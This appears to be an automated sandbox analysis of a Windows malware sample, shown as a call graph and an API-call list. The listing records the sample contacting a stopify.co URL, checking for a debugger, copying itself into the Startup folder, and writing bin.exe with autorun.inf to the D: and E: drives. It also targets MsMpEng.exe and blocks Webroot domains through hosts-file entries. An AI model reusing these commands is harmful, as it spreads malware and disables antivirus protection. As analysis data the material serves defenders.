205c99 5135->5136 5137 207df0 2 API calls 5136->5137 5138 205ca8 Sleep 5137->5138 5139 207e40 11 API calls 5138->5139 5140 205cbc 5139->5140 5141 207e40 11 API calls 5140->5141 5142 205cd0 5141->5142 5143 202240 92 API calls 5142->5143 5144 205ce5 5143->5144 5145 207df0 2 API calls 5144->5145 5146 205cf0 5145->5146 5147 207df0 2 API calls 5146->5147 5148 205cff Sleep 5147->5148 5149 207e40 11 API calls 5148->5149 5150 205d13 5149->5150 5151 207e40 11 API calls 5150->5151 5152 205d27 5151->5152 5153 202240 92 API calls 5152->5153 5154 205d3c 5153->5154 5155 207df0 2 API calls 5154->5155 5156 205d47 5155->5156 5157 207df0 2 API calls 5156->5157 5158 205d56 Sleep 5157->5158 5159 207e40 11 API calls 5158->5159 5160 205d6a 5159->5160 5161 207e40 11 API calls 5160->5161 5162 205d7e 5161->5162 5163 202240 92 API calls 5162->5163 5164 205d93 5163->5164 5165 207df0 2 API calls 5164->5165 5166 205d9e 5165->5166 5167 207df0 2 API calls 5166->5167 5168 205dad Sleep 5167->5168 5169 207e40 11 API calls 5168->5169 5170 205dc1 5169->5170 5171 207e40 11 API calls 5170->5171 5172 205dd5 5171->5172 5173 202240 92 API calls 5172->5173 5174 205dea 5173->5174 5175 207df0 2 API calls 5174->5175 5176 205df5 5175->5176 5177 207df0 2 API calls 5176->5177 5178 205e04 Sleep 5177->5178 5179 207e40 11 API calls 5178->5179 5180 205e18 5179->5180 5181 207e40 11 API calls 5180->5181 5182 205e2c 5181->5182 5183 202240 92 API calls 5182->5183 5184 205e41 5183->5184 5185 207df0 2 API calls 5184->5185 5186 205e4c 5185->5186 5187 207df0 2 API calls 5186->5187 5188 205e5b Sleep 5187->5188 5189 207e40 11 API calls 5188->5189 5190 205e6f 5189->5190 5191 207e40 11 API calls 5190->5191 5192 205e83 5191->5192 5193 202240 92 API calls 5192->5193 5194 205e98 5193->5194 5195 207df0 2 API calls 5194->5195 5196 205ea3 5195->5196 5197 207df0 2 API calls 5196->5197 5198 205eb2 Sleep 5197->5198 5199 207e40 11 API calls 5198->5199 5200 205ec6 5199->5200 5201 207e40 11 API calls 5200->5201 5202 205eda 5201->5202 5203 
202240 92 API calls 5202->5203 5204 205eef 5203->5204 5205 207df0 2 API calls 5204->5205 5206 205efa 5205->5206 5207 207df0 2 API calls 5206->5207 5208 205f09 Sleep 5207->5208 5209 207e40 11 API calls 5208->5209 5210 205f1d 5209->5210 5211 207e40 11 API calls 5210->5211 5212 205f31 5211->5212 5213 202240 92 API calls 5212->5213 5214 205f46 5213->5214 5215 207df0 2 API calls 5214->5215 5216 205f51 5215->5216 5217 207df0 2 API calls 5216->5217 5218 205f60 Sleep 5217->5218 5219 207e40 11 API calls 5218->5219 5220 205f74 5219->5220 5221 207e40 11 API calls 5220->5221 5222 205f88 5221->5222 5223 202240 92 API calls 5222->5223 5224 205f9d 5223->5224 5225 207df0 2 API calls 5224->5225 5226 205fa8 5225->5226 5227 207df0 2 API calls 5226->5227 5228 205fb7 Sleep 5227->5228 5229 207e40 11 API calls 5228->5229 5230 205fcb 5229->5230 5231 207e40 11 API calls 5230->5231 5232 205fdf 5231->5232 5233 202240 92 API calls 5232->5233 5234 205ff4 5233->5234 5235 207df0 2 API calls 5234->5235 5236 205fff 5235->5236 5237 207df0 2 API calls 5236->5237 5238 20600e Sleep 5237->5238 5239 207e40 11 API calls 5238->5239 5240 206022 5239->5240 5241 207e40 11 API calls 5240->5241 5242 206036 5241->5242 5243 202240 92 API calls 5242->5243 5244 20604b 5243->5244 5245 207df0 2 API calls 5244->5245 5246 206056 5245->5246 5247 207df0 2 API calls 5246->5247 5248 206065 Sleep 5247->5248 5249 207e40 11 API calls 5248->5249 5250 206079 5249->5250 5251 207e40 11 API calls 5250->5251 5252 20608d 5251->5252 5253 202240 92 API calls 5252->5253 5254 2060a2 5253->5254 5255 207df0 2 API calls 5254->5255 5256 2060ad 5255->5256 5257 207df0 2 API calls 5256->5257 5258 2060bc Sleep 5257->5258 5259 207e40 11 API calls 5258->5259 5260 2060d0 5259->5260 5261 207e40 11 API calls 5260->5261 5262 2060e4 5261->5262 5263 202240 92 API calls 5262->5263 5264 2060f9 5263->5264 5265 207df0 2 API calls 5264->5265 5266 206104 5265->5266 5267 207df0 2 API calls 5266->5267 5268 206113 Sleep 5267->5268 5269 207e40 11 API calls 
5268->5269 5270 206127 5269->5270 5271 207e40 11 API calls 5270->5271 5272 20613b 5271->5272 5273 202240 92 API calls 5272->5273 5274 206150 5273->5274 5275 207df0 2 API calls 5274->5275 5276 20615b 5275->5276 5277 207df0 2 API calls 5276->5277 5278 20616a Sleep 5277->5278 5279 207e40 11 API calls 5278->5279 5280 20617e 5279->5280 5281 207e40 11 API calls 5280->5281 5282 206192 5281->5282 5283 202240 92 API calls 5282->5283 5284 2061a7 5283->5284 5285 207df0 2 API calls 5284->5285 5286 2061b2 5285->5286 5287 207df0 2 API calls 5286->5287 5288 2061c1 Sleep 5287->5288 5289 207e40 11 API calls 5288->5289 5290 2061d5 5289->5290 5291 207e40 11 API calls 5290->5291 5292 2061e9 5291->5292 5293 202240 92 API calls 5292->5293 5294 2061fe 5293->5294 5295 207df0 2 API calls 5294->5295 5296 206209 5295->5296 5297 207df0 2 API calls 5296->5297 5298 206218 Sleep 5297->5298 5299 207e40 11 API calls 5298->5299 5300 20622c 5299->5300 5301 207e40 11 API calls 5300->5301 5302 206240 5301->5302 5303 202240 92 API calls 5302->5303 5304 206255 5303->5304 5305 207df0 2 API calls 5304->5305 5306 206260 5305->5306 5307 207df0 2 API calls 5306->5307 5308 20626f Sleep 5307->5308 5309 207e40 11 API calls 5308->5309 5310 206283 5309->5310 5311 207e40 11 API calls 5310->5311 5312 206297 5311->5312 5313 202240 92 API calls 5312->5313 5314 2062ac 5313->5314 5315 207df0 2 API calls 5314->5315 5316 2062b7 5315->5316 5317 207df0 2 API calls 5316->5317 5318 2062c6 Sleep 5317->5318 5319 207e40 11 API calls 5318->5319 5320 2062da 5319->5320 5321 207e40 11 API calls 5320->5321 5322 2062ee 5321->5322 5323 202240 92 API calls 5322->5323 5324 206303 5323->5324 5325 207df0 2 API calls 5324->5325 5326 20630e 5325->5326 5327 207df0 2 API calls 5326->5327 5328 20631d Sleep 5327->5328 5329 207e40 11 API calls 5328->5329 5330 206331 5329->5330 5331 207e40 11 API calls 5330->5331 5332 206345 5331->5332 5333 202240 92 API calls 5332->5333 5334 20635a 5333->5334 5335 207df0 2 API calls 5334->5335 5336 206365 
5335->5336 5337 207df0 2 API calls 5336->5337 5338 206374 Sleep 5337->5338 5339 207e40 11 API calls 5338->5339 5340 206388 5339->5340 5341 207e40 11 API calls 5340->5341 5342 20639c 5341->5342 5343 202240 92 API calls 5342->5343 5344 2063b1 5343->5344 5345 207df0 2 API calls 5344->5345 5346 2063bc 5345->5346 5347 207df0 2 API calls 5346->5347 5348 2063cb Sleep 5347->5348 5349 207e40 11 API calls 5348->5349 5350 2063df 5349->5350 5351 207e40 11 API calls 5350->5351 5352 2063f3 5351->5352 5353 202240 92 API calls 5352->5353 5354 206408 5353->5354 5355 207df0 2 API calls 5354->5355 5356 206413 5355->5356 5357 207df0 2 API calls 5356->5357 5358 206422 Sleep 5357->5358 5359 207e40 11 API calls 5358->5359 5360 206436 5359->5360 5361 207e40 11 API calls 5360->5361 5362 20644a 5361->5362 5363 202240 92 API calls 5362->5363 5364 20645f 5363->5364 5365 207df0 2 API calls 5364->5365 5366 20646a 5365->5366 5367 207df0 2 API calls 5366->5367 5368 206479 Sleep 5367->5368 5369 207e40 11 API calls 5368->5369 5370 20648d 5369->5370 5371 207e40 11 API calls 5370->5371 5372 2064a1 5371->5372 5373 202240 92 API calls 5372->5373 5374 2064b6 5373->5374 5375 207df0 2 API calls 5374->5375 5376 2064c1 5375->5376 5377 207df0 2 API calls 5376->5377 5378 2064d0 Sleep 5377->5378 5379 207e40 11 API calls 5378->5379 5380 2064e4 5379->5380 5381 207e40 11 API calls 5380->5381 5382 2064f8 5381->5382 5383 202240 92 API calls 5382->5383 5384 20650d 5383->5384 5385 207df0 2 API calls 5384->5385 5386 206518 5385->5386 5387 207df0 2 API calls 5386->5387 5388 206527 Sleep 5387->5388 5389 207e40 11 API calls 5388->5389 5390 20653b 5389->5390 5391 207e40 11 API calls 5390->5391 5392 20654f 5391->5392 5393 202240 92 API calls 5392->5393 5394 206564 5393->5394 5395 207df0 2 API calls 5394->5395 5396 20656f 5395->5396 5397 207df0 2 API calls 5396->5397 5398 20657e Sleep 5397->5398 5399 207e40 11 API calls 5398->5399 5400 206592 5399->5400 5401 207e40 11 API calls 5400->5401 5402 2065a6 5401->5402 5403 202240 
92 API calls 5402->5403 5404 2065bb 5403->5404 5405 207df0 2 API calls 5404->5405 5406 2065c6 5405->5406 5407 207df0 2 API calls 5406->5407 5408 2065d5 Sleep 5407->5408 5409 207e40 11 API calls 5408->5409 5410 2065e9 5409->5410 5411 207e40 11 API calls 5410->5411 5412 2065fd 5411->5412 5413 202240 92 API calls 5412->5413 5414 206612 5413->5414 5415 207df0 2 API calls 5414->5415 5416 20661d 5415->5416 5417 207df0 2 API calls 5416->5417 5418 20662c Sleep 5417->5418 5419 207e40 11 API calls 5418->5419 5420 206640 5419->5420 5421 207e40 11 API calls 5420->5421 5422 206654 5421->5422 5423 202240 92 API calls 5422->5423 5424 206669 5423->5424 5425 207df0 2 API calls 5424->5425 5426 206674 5425->5426 5427 207df0 2 API calls 5426->5427 5428 206683 Sleep 5427->5428 5429 207e40 11 API calls 5428->5429 5430 206697 5429->5430 5431 207e40 11 API calls 5430->5431 5432 2066ab 5431->5432 5433 202240 92 API calls 5432->5433 5434 2066c0 5433->5434 5435 207df0 2 API calls 5434->5435 5436 2066cb 5435->5436 5437 207df0 2 API calls 5436->5437 5438 2066da Sleep 5437->5438 5439 207e40 11 API calls 5438->5439 5440 2066ee 5439->5440 5441 207e40 11 API calls 5440->5441 5442 206702 5441->5442 5443 202240 92 API calls 5442->5443 5444 206717 5443->5444 5445 207df0 2 API calls 5444->5445 5446 206722 5445->5446 5447 207df0 2 API calls 5446->5447 5448 206731 Sleep 5447->5448 5449 207e40 11 API calls 5448->5449 5450 206745 5449->5450 5451 207e40 11 API calls 5450->5451 5452 206759 5451->5452 5453 202240 92 API calls 5452->5453 5454 20676e 5453->5454 5455 207df0 2 API calls 5454->5455 5456 206779 5455->5456 5457 207df0 2 API calls 5456->5457 5458 206788 Sleep 5457->5458 5459 207e40 11 API calls 5458->5459 5460 20679c 5459->5460 5461 207e40 11 API calls 5460->5461 5462 2067b0 5461->5462 5463 202240 92 API calls 5462->5463 5464 2067c5 5463->5464 5465 207df0 2 API calls 5464->5465 5466 2067d0 5465->5466 5467 207df0 2 API calls 5466->5467 5468 2067df Sleep 5467->5468 5469 207e40 11 API calls 5468->5469 
5470 2067f3 5469->5470 5471 207e40 11 API calls 5470->5471 5472 206807 5471->5472 5473 202240 92 API calls 5472->5473 5474 20681c 5473->5474 5475 207df0 2 API calls 5474->5475 5476 206827 5475->5476 5477 207df0 2 API calls 5476->5477 5478 206836 Sleep 5477->5478 5479 207e40 11 API calls 5478->5479 5480 20684a 5479->5480 5481 207e40 11 API calls 5480->5481 5482 20685e 5481->5482 5483 202240 92 API calls 5482->5483 5484 206873 5483->5484 5485 207df0 2 API calls 5484->5485 5486 20687e 5485->5486 5487 207df0 2 API calls 5486->5487 5488 20688d Sleep 5487->5488 5489 207e40 11 API calls 5488->5489 5490 2068a1 5489->5490 5491 207e40 11 API calls 5490->5491 5492 2068b5 5491->5492 5493 202240 92 API calls 5492->5493 5494 2068ca 5493->5494 5495 207df0 2 API calls 5494->5495 5496 2068d5 5495->5496 5497 207df0 2 API calls 5496->5497 5498 2068e4 Sleep 5497->5498 5499 206910 5498->5499 5501 207be0 11 API calls 5499->5501 5772 207be0 5499->5772 5502 206949 5501->5502 5503 207be0 11 API calls 5502->5503 5504 20695d 5503->5504 5505 207be0 11 API calls 5504->5505 5506 206971 5505->5506 5507 207be0 11 API calls 5506->5507 5508 206985 5507->5508 5509 207be0 11 API calls 5508->5509 5510 207be0 11 API calls 5508->5510 5509->5508 5511 2069ad 5510->5511 5512 207be0 11 API calls 5511->5512 5513 2069c1 5512->5513 5514 207be0 11 API calls 5513->5514 5515 2069d5 5514->5515 5516 207be0 11 API calls 5515->5516 5517 2069e9 5516->5517 5518 207be0 11 API calls 5517->5518 5519 207be0 11 API calls 5517->5519 5518->5517 5520 206a11 5519->5520 5521 207be0 11 API calls 5520->5521 5522 206a25 5521->5522 5523 207be0 11 API calls 5522->5523 5524 206a39 5523->5524 5525 207be0 11 API calls 5524->5525 5526 206a4d 5525->5526 5527 207be0 11 API calls 5526->5527 5528 207be0 11 API calls 5526->5528 5527->5526 5529 206a75 5528->5529 5530 207be0 11 API calls 5529->5530 5531 206a89 5530->5531 5532 207be0 11 API calls 5531->5532 5533 206a9d 5532->5533 5534 207be0 11 API calls 5533->5534 5535 206ab1 5534->5535 5536 
207be0 11 API calls 5535->5536 5537 207be0 11 API calls 5535->5537 5536->5535 5538 206adc 5537->5538 5539 207be0 11 API calls 5538->5539 5540 206af0 5539->5540 5541 207be0 11 API calls 5540->5541 5542 206b04 5541->5542 5543 207be0 11 API calls 5542->5543 5544 206b18 5543->5544 5545 207be0 11 API calls 5544->5545 5546 207be0 11 API calls 5544->5546 5545->5544 5547 206b40 5546->5547 5548 207be0 11 API calls 5547->5548 5549 206b54 5548->5549 5550 207be0 11 API calls 5549->5550 5551 206b68 5550->5551 5552 207be0 11 API calls 5551->5552 5553 206b7c 5552->5553 5554 207be0 11 API calls 5553->5554 5555 207be0 11 API calls 5553->5555 5554->5553 5556 206ba4 5555->5556 5557 207be0 11 API calls 5556->5557 5558 206bb8 5557->5558 5559 207be0 11 API calls 5558->5559 5560 206bcc 5559->5560 5561 207be0 11 API calls 5560->5561 5562 206be0 5561->5562 5563 207be0 11 API calls 5562->5563 5564 207be0 11 API calls 5562->5564 5563->5562 5565 206c08 5564->5565 5566 207be0 11 API calls 5565->5566 5567 206c1c 5566->5567 5568 206e2c 5567->5568 5577 206c9d 5567->5577 5585 206c55 5567->5585 5804 208d00 ?_Xlength_error@std@@YAXPBD 5568->5804 5570 206e31 5805 201e40 5570->5805 5571 206c8e 5576 209759 std::_Facet_Register 5 API calls 5571->5576 5572 206d17 5589 206e02 5572->5589 5728 201f90 CreateToolhelp32Snapshot 5572->5728 5573 206e08 Sleep 5744 206e40 5573->5744 5574 206c6e 5574->4127 5574->5572 5579 209759 std::_Facet_Register 5 API calls 5574->5579 5581 206c7f 5574->5581 5588 206dc5 5574->5588 5576->5581 5591 206cf7 5577->5591 5789 209100 5577->5789 5579->5574 5580 206e36 5581->5571 5581->5577 5585->5570 5585->5574 5585->5581 5586 206d58 OpenProcess 5585->5586 5586->5585 5587 206d6a TerminateProcess CloseHandle 5586->5587 5587->5585 5590 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5588->5590 5589->5573 5590->5591 5591->5572 5591->5573 5593 209ce9 5592->5593 5593->4070 5593->4083 5595 20a13e 5594->5595 5596 20a14a memset memset IsDebuggerPresent SetUnhandledExceptionFilter 
UnhandledExceptionFilter 5595->5596 5597 20a234 5596->5597 5597->4070 5599 209f68 5598->5599 5599->4089 5601 208570 ?good@ios_base@std@ 5600->5601 5603 2085da 5601->5603 5605 208600 5601->5605 5603->5605 5606 2085eb ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 5603->5606 5604 208610 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N ?uncaught_exception@std@ 5609 2029ed 5604->5609 5610 20871b ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5604->5610 5605->5604 5608 208666 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 5605->5608 5611 20863b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5605->5611 5606->5605 5608->5604 5612 208682 5608->5612 5609->4093 5610->5609 5611->5604 5611->5605 5612->5604 5613 2086ae ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5612->5613 5613->5604 5613->5612 5615 2021a1 InternetOpenUrlW 5614->5615 5616 202207 GetLastError 5614->5616 5617 2021bc InternetCloseHandle InternetCloseHandle 5615->5617 5618 2021cf GetLastError 5615->5618 5619 208530 9 API calls 5616->5619 5617->4096 5620 208530 9 API calls 5618->5620 5621 202223 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5619->5621 5622 2021eb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z InternetCloseHandle 5620->5622 5621->4096 5622->4096 5624 207e70 5623->5624 5624->5624 5625 207f40 5624->5625 5626 207e85 5624->5626 5808 201ee0 ?_Xlength_error@std@@YAXPBD 5625->5808 5627 207e91 memcpy 5626->5627 5633 207eae 5626->5633 5627->4113 5629 207f45 5631 201e40 Concurrency::cancel_current_task 2 API calls 5629->5631 5630 207ebb 5635 209759 std::_Facet_Register 5 API calls 5630->5635 5636 207f4a 5631->5636 5632 207f05 5634 207ed7 memcpy 5632->5634 5637 209759 std::_Facet_Register 5 API calls 5632->5637 5633->5629 5633->5630 5633->5632 
5634->4113 5639 207ece 5635->5639 5637->5634 5639->5634 5640 207eff _invalid_parameter_noinfo_noreturn 5639->5640 5640->5632 5642 208d57 ?good@ios_base@std@ 5641->5642 5644 208d92 5642->5644 5650 208db8 5642->5650 5645 208da3 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 ?good@ios_base@std@ 5644->5645 5644->5650 5645->5650 5647 208e1f ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J 5651 208dc8 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N ?uncaught_exception@std@ 5647->5651 5653 208e12 5647->5653 5648 208ec3 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5649 202d89 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z GetEnvironmentVariableA 5648->5649 5649->4135 5649->4136 5650->5647 5650->5651 5652 208df4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5650->5652 5651->5648 5651->5649 5652->5650 5652->5653 5653->5651 5654 208e44 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 5653->5654 5654->5651 5654->5653 5809 201d30 5655->5809 5657 201d57 __stdio_common_vsprintf 5657->4139 5659 207d26 memcpy 5658->5659 5660 207d57 5658->5660 5659->4145 5660->4145 5810 207f50 5662->5810 5664 2028bd 5665 202950 5664->5665 5668 208960 18 API calls 5664->5668 5666 20297b 5665->5666 5669 202975 _invalid_parameter_noinfo_noreturn 5665->5669 5672 202982 5665->5672 5670 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5666->5670 5667 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5671 20299e 5667->5671 5668->5664 5669->5666 5670->5672 5673 207d80 5671->5673 5672->5667 5675 207d93 5673->5675 5674 207dd0 5674->4151 5675->5674 5676 207db5 memcpy 5675->5676 5676->4151 5678 207dfb 5677->5678 5682 202e52 system 5677->5682 5680 207e35 _invalid_parameter_noinfo_noreturn 5678->5680 5681 207e16 5678->5681 5679 209aef std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t free 5679->5682 5681->5679 5683 202240 memset 5682->5683 5684 2022a1 5683->5684 5685 
2022a3 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5683->5685 5684->5685 5862 2083f0 5685->5862 5688 202393 ??7ios_base@std@ 5690 2023da 5688->5690 5698 202413 5688->5698 5689 20237b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 5689->5688 5691 208530 9 API calls 5690->5691 5693 2023ea 5691->5693 5692 20248a ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5692->5698 5695 208d10 9 API calls 5693->5695 5694 2024ad ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5694->5698 5697 202403 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5695->5697 5696 2024cb 5890 208f00 5696->5890 5727 202669 5697->5727 5698->5692 5698->5694 5698->5696 5699 2024f0 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5698->5699 5704 202532 ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5698->5704 5871 209570 5698->5871 5699->5698 5702 20268c 5705 20974b __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 5702->5705 5704->5698 5708 2026a4 5705->5708 5706 20255f memset 5917 206ec0 5706->5917 5708->4156 5710 2025a1 5712 208530 9 API calls 5710->5712 5711 2025cf ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 5713 208310 9 API calls 5711->5713 5715 2025b1 5712->5715 5714 2025f2 5713->5714 5716 2025f6 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 5714->5716 5717 20260e 5714->5717 5718 208d10 9 API calls 5715->5718 5716->5717 5719 208530 9 API calls 5717->5719 5720 2025ca 5718->5720 5721 202623 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 5719->5721 5720->5721 5722 202770 12 API calls 5721->5722 5723 202636 5722->5723 5724 202662 5723->5724 5725 20265c _invalid_parameter_noinfo_noreturn 5723->5725 5723->5727 5726 
                                                      APIs
                                                        • Part of subcall function 00208530: ?good@ios_base@std@@QBE_NXZ.MSVCP140(3BC7ADCC,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085D0
                                                        • Part of subcall function 00208530: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085EB
                                                        • Part of subcall function 00208530: ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002085F8
                                                        • Part of subcall function 00208530: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208708
                                                        • Part of subcall function 00208530: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020870E
                                                        • Part of subcall function 00208530: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020871D
                                                        • Part of subcall function 00208530: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 0020864E
                                                        • Part of subcall function 00202180: InternetOpenW.WININET(MyApp,00000001,00000000,00000000,00000000), ref: 00202195
                                                        • Part of subcall function 00202180: InternetOpenUrlW.WININET(00000000,https://stopify.co/news.php?tid=JBB69H.jpg ,00000000,00000000,80000000,00000000), ref: 002021B2
                                                        • Part of subcall function 00202180: InternetCloseHandle.WININET(00000000), ref: 002021BD
                                                        • Part of subcall function 00202180: InternetCloseHandle.WININET(00000000), ref: 002021C4
                                                      • IsDebuggerPresent.KERNEL32(3BC7ADCC), ref: 00202A02
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00202A16
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750), ref: 00202A74
                                                      • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 00202A91
                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(USERNAME), ref: 00202AA3
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00208750), ref: 00202AC7
                                                        • Part of subcall function 00209400: memcpy.VCRUNTIME140(00000000,C:\Users\,?,?,00000000,00000001), ref: 002094CB
                                                        • Part of subcall function 00209400: memcpy.VCRUNTIME140(?,?,?,00000000,C:\Users\,?,?,00000000,00000001), ref: 002094D9
                                                        • Part of subcall function 00208960: memcpy.VCRUNTIME140(00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B71
                                                        • Part of subcall function 00208960: memcpy.VCRUNTIME140(?,?,?,00000000,7FFFFFFF,?,00000000,00000000), ref: 00208B7F
                                                      • memcpy.VCRUNTIME140(00000009,00000000,?,00000000), ref: 00202B51
                                                      • memcpy.VCRUNTIME140(00000000,C:\Users\,00000009,00000009,00000000,?,00000000), ref: 00202B62
                                                      • memcpy.VCRUNTIME140(?,0020D31E,00000009,00000000,C:\Users\,00000009,00000009,00000000,?,00000000), ref: 00202B80
                                                      • memcpy.VCRUNTIME140(?,\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,0000003E,00000009,00000000,00000009,00000000), ref: 00202C2F
                                                        • Part of subcall function 00208530: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,000000FF,00000000,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 00208677
                                                        • Part of subcall function 00208530: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,00000000,?,00000000,0020BB15,000000FF,?,0020203D,00208750), ref: 002086C1
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000018,00000026,00207B80,MsMpEng.exe,aips.exe), ref: 00202D28
                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00000000,00000009,00000000), ref: 00202D8E
                                                      • GetEnvironmentVariableA.KERNEL32(USERNAME,?,00000104), ref: 00202DA5
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,0020D35C,?,?), ref: 00202E5F
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,copy /v /y "%s" D:\bin.exe,?,?,?), ref: 00202E91
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo [autorun] > D:\autorun.inf,?,?), ref: 00202E98
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo open=bin.exe >> D:\autorun.inf,?,?), ref: 00202E9F
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,copy /v /y "%s" E:\bin.exe,?,?,?), ref: 00202EC0
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo [autorun] > E:\autorun.inf,?,?), ref: 00202EC7
                                                      • system.API-MS-WIN-CRT-RUNTIME-L1-1-0(echo open=bin.exe >> E:\autorun.inf,?,?), ref: 00202ECE
                                                      • Sleep.KERNELBASE(00000001), ref: 00202EF2
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 mail.webroot.com), ref: 00202F49
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 carbonite.webroot.com), ref: 00202FA0
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 e.webroot.com), ref: 00202FF7
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 entupdates-cdn.webroot.com), ref: 0020304E
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp-carbonite.webroot.com), ref: 002030A5
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 lp.webroot.com), ref: 002030FC
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 technet.webroot.com), ref: 00203172
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 technet.webroot.com), ref: 00203184
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 cms.webroot.com), ref: 00203244
                                                      • Sleep.KERNELBASE(00000001,C:\Windows\System32\drivers\etc\hosts,1.1.1.1 cms.webroot.com), ref: 00203256
                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(C:\Windows\System32\drivers\etc\hosts,1.1.1.1 partner.webroot.com), ref: 00203316
